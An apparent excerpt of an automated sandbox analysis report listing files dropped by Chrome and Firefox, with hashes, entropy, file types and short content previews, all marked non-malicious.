                                                                                                                                                                                                                                                                                                                                                      MD5:5DDA823095E737A57B3DBF884B09F994
                                                                                                                                                                                                                                                                                                                                                      SHA1:45D87D53BEE91AB0066C44BD6F3102497B2B27CA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D4003398373D1F18100AD9410A2FE9DDE94586F6800E1A5563FC0FAB8F2CC106
                                                                                                                                                                                                                                                                                                                                                      SHA-512:01CADF3889F8A20E022D47EA4DDFFA0881693027AFA06BD7663F4D1B62CCE376968894ECE0C7982C714DCFB61716985F1FD551E72640D9261E6363F42AF38FBB
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......6.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2689
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.008667920969143
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8OdjTMnjAHbidAKZdA14meh7sFiZUkmgqeh7sQy+BX:8iSGnuy
                                                                                                                                                                                                                                                                                                                                                      MD5:14795973F39AB219C87D2EB53CB60DDB
                                                                                                                                                                                                                                                                                                                                                      SHA1:2D38C21219EC56231C19164067730AF6930E7105
                                                                                                                                                                                                                                                                                                                                                      SHA-256:B912C5C67AD6C854D33714574EF66F6D3B2C43CCE60E37237A3FE9EE87E7B5B5
                                                                                                                                                                                                                                                                                                                                                      SHA-512:50A37318C6A6196E972E1A5DCAD477EED7C11B0FB16EC0B1BCA80F8478FAFDEFBCF156B88583D6635F60BD03EF76B2DC4164FA4FD611C67815508B00FC46470E
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.999283071118521
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8H7djTMnjinHbidAKZdA1TehDiZUkwqehWy+R:8HlSioYy
                                                                                                                                                                                                                                                                                                                                                      MD5:5666782821E0E601178AC5FA43B0B81B
                                                                                                                                                                                                                                                                                                                                                      SHA1:BA27EFB52AF8DA006DB56D67C369384A45AD9FD2
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3EC83179F7DEDB946F34AF1435C2F399B751570E0726C81F71DBDC095CA7281E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F8038AA46A4D0F200AE8BB5EA40246A11A7C0EED0DA6ABA7FB97E460B7BC0A452938E39B56831B3ADA5E98ED37F308451F855A7E3B79B2CC089561E2F0D585D1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9873559385057593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:80djTMnjinHbidAKZdA1dehBiZUk1W1qehky+C:8sSiY9Ey
                                                                                                                                                                                                                                                                                                                                                      MD5:EB3C58C54EFD4B61B0B846A093415801
                                                                                                                                                                                                                                                                                                                                                      SHA1:C2FD2184FF585CC0450DA4EDEFCFE8707494FEC1
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F854FF525DCA084F7B62A81EBD18182FAECCE60024F5C18058BE8553089224F7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C585E27CC364318D22659FA8473D40F5245A18D0087BA5A4708607485EA3A9BFB65A01D1442A6660206AA2D7C622F043E0F82C135B75FFE881997A45D216075A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9977048374668267
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8JdjTMnjinHbidAKZdA1duTeehOuTbbiZUk5OjqehOuTbuy+yT+:8vSiqTfTbxWOvTbuy7T
                                                                                                                                                                                                                                                                                                                                                      MD5:BF10447F74B757445EFCC42C265352F6
                                                                                                                                                                                                                                                                                                                                                      SHA1:1AD9BB54C4B26F2B37B2BE5BBC1D04DAADD3A9F7
                                                                                                                                                                                                                                                                                                                                                      SHA-256:B7FD18B96B9AC87BE73E6A7E929987AA7C9D0174E2DDEB95957A5953305F6AAD
                                                                                                                                                                                                                                                                                                                                                      SHA-512:729A0A75C0C83A11E9AA774FA79DEFDEE8ED5B0BF721121540194145A47F4755B10E05B3C5168E8E6E908C1B3A0B7321FB085E0825F357C76C3AEB94687E0293
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3621
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.929680976946779
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YnSwkmrOIfPUFuOdwNIOdoWLEWLtkDB/u4x5FBvipA6kbSathfkLuhakNzN9vXxE:8S+OIfPUFuOdwNIOd8jvYR0uL21X8P
                                                                                                                                                                                                                                                                                                                                                      MD5:3636E4E8BD0E43F071FE046B1BB65EFF
                                                                                                                                                                                                                                                                                                                                                      SHA1:27EF15AFE44BA736155FDBDA77D03978ED777469
                                                                                                                                                                                                                                                                                                                                                      SHA-256:545B8D72E60CB603C5588B090BDD24043936EAB96E1A564E29CB30540208BE78
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A520AE7152121CC4C55F32575CC8C56B623E992DC2D7870EE81E966528EA2FA4FD13E1BFD951CB3BD1DFD9F4BFFA7D1B497393BDBA59243C2448B2AB345A4A05
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"9c4f630b-d3dc-4236-9fe2-a1415309e4e4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-06T09:08:30.452Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3621
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.929680976946779
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YnSwkmrOIfPUFuOdwNIOdoWLEWLtkDB/u4x5FBvipA6kbSathfkLuhakNzN9vXxE:8S+OIfPUFuOdwNIOd8jvYR0uL21X8P
                                                                                                                                                                                                                                                                                                                                                      MD5:3636E4E8BD0E43F071FE046B1BB65EFF
                                                                                                                                                                                                                                                                                                                                                      SHA1:27EF15AFE44BA736155FDBDA77D03978ED777469
                                                                                                                                                                                                                                                                                                                                                      SHA-256:545B8D72E60CB603C5588B090BDD24043936EAB96E1A564E29CB30540208BE78
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A520AE7152121CC4C55F32575CC8C56B623E992DC2D7870EE81E966528EA2FA4FD13E1BFD951CB3BD1DFD9F4BFFA7D1B497393BDBA59243C2448B2AB345A4A05
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"9c4f630b-d3dc-4236-9fe2-a1415309e4e4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-06T09:08:30.452Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 23432 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5312
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.615424734763731
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrw2D:VTx2x2t0FDJ4NpwZMd0EJws
                                                                                                                                                                                                                                                                                                                                                      MD5:1B9C8056D3619CE5A8C59B0C09873F17
                                                                                                                                                                                                                                                                                                                                                      SHA1:1015C630E1937AA63F6AB31743782ECB5D78CCD8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                                                                                                                                                                                      MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                                                                                                                                                      SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"schema":6,"addons":[]}
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 5, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 8, cookie 0x6, schema 4, largest root page 8, UTF-8, vacuum mode 1, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):262144
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04905141882491872
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:DLSvwae+Q8Uu50xj0aWe9LxYkKA25Q5tvAA:DKwae+QtMImelekKDa5
                                                                                                                                                                                                                                                                                                                                                      MD5:8736A542C5564A922C47B19D9CC5E0F2
                                                                                                                                                                                                                                                                                                                                                      SHA1:CE9D58967DA9B5356D6C1D8A482F9CE74DA9097A
                                                                                                                                                                                                                                                                                                                                                      SHA-256:97CE5D8AFBB0AA610219C4FAC3927E32C91BFFD9FD971AF68C718E7B27E40077
                                                                                                                                                                                                                                                                                                                                                      SHA-512:99777325893DC7A95FD49B2DA18D32D65F97CC7A8E482D78EDC32F63245457FA5A52750800C074D552D20B6A215604161FDC88763D93C76A8703470C3064196B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                                                                                                                                                                                      MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                                                                                                                                                      SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):36830
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.187080624303907
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:9I4ivfiXD4R6C444ylW47s48yilvs4/4ji4P4a4Bd4U:9i1AyQvP
                                                                                                                                                                                                                                                                                                                                                      MD5:5774E6BEEB8C63A660A4C37E130F7D30
                                                                                                                                                                                                                                                                                                                                                      SHA1:B3F7B89A4A143BA839593F6368822C5E7C0FE20D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E2C331AEE64E1D381A7D9E579E7EB7236AFDE83239780D18945DE3152602E610
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2F16D11971091141224DFF45721E96E5617CCA12E6EC5AC037770D35251CEC28D8758929474424F01B2BBD6236EDBCE82CD2E20FECE3A95E5C0173E345979E47
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{45005050-3e88-41ad-8766-e52c88f37369}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1021904
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                                                                                                                                                                                                                                                                                      MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                                                                                                                                                      SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                      • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: rpDOUhuBC5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: cMTqzvmx9u.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: NetFxRepairTools.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: nM0h824cc3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      • Filename: gTU8ed4669.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1021904
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                                                                                                                                                                                                                                                                                      MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                                                                                                                                                      SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):116
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                                                                                                                                                                                                                                                                                      MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                                                                                                                                                      SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):116
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                                                                                                                                                                                                                                                                                      MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                                                                                                                                                      SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.034879679751218286
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:GtWt8BUAtPMXLIPWt8BUAtPMXRD89XuM:KtPMMrtPMhDsuM
                                                                                                                                                                                                                                                                                                                                                      MD5:40190EADA6F596D0EF3D69BDF9958749
                                                                                                                                                                                                                                                                                                                                                      SHA1:6186D14F4B5F7CCE0025B000EA5D5070B6789171
                                                                                                                                                                                                                                                                                                                                                      SHA-256:4E93C36FFC20567F378BE09CF72AB773E3034DDDB6B593E3027B60DC29D1765E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:56092D41786AD9FD65504CB6BC1134347159770D84DD4FD4FBDB10DDFE9F335F60E27797EAA827B680972B11645DEDB4CFDF7C92F93D09EB04BB9D3D08C24C84
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32824
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.039337408163668056
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ol10ZukulfzIRB5SH/rl8rEXsxdwhml8XW3R2:KeZMhIRTSfrl8dMhm93w
                                                                                                                                                                                                                                                                                                                                                      MD5:227AF594E5F102A2C9A926E6622FF33E
                                                                                                                                                                                                                                                                                                                                                      SHA1:FDB72172BF311F3BB6A25DF8CE87F39325F315BA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5C06E323714D53B97AE49B12DB4241944EB192872543BB48515EB8F6D2515E6E
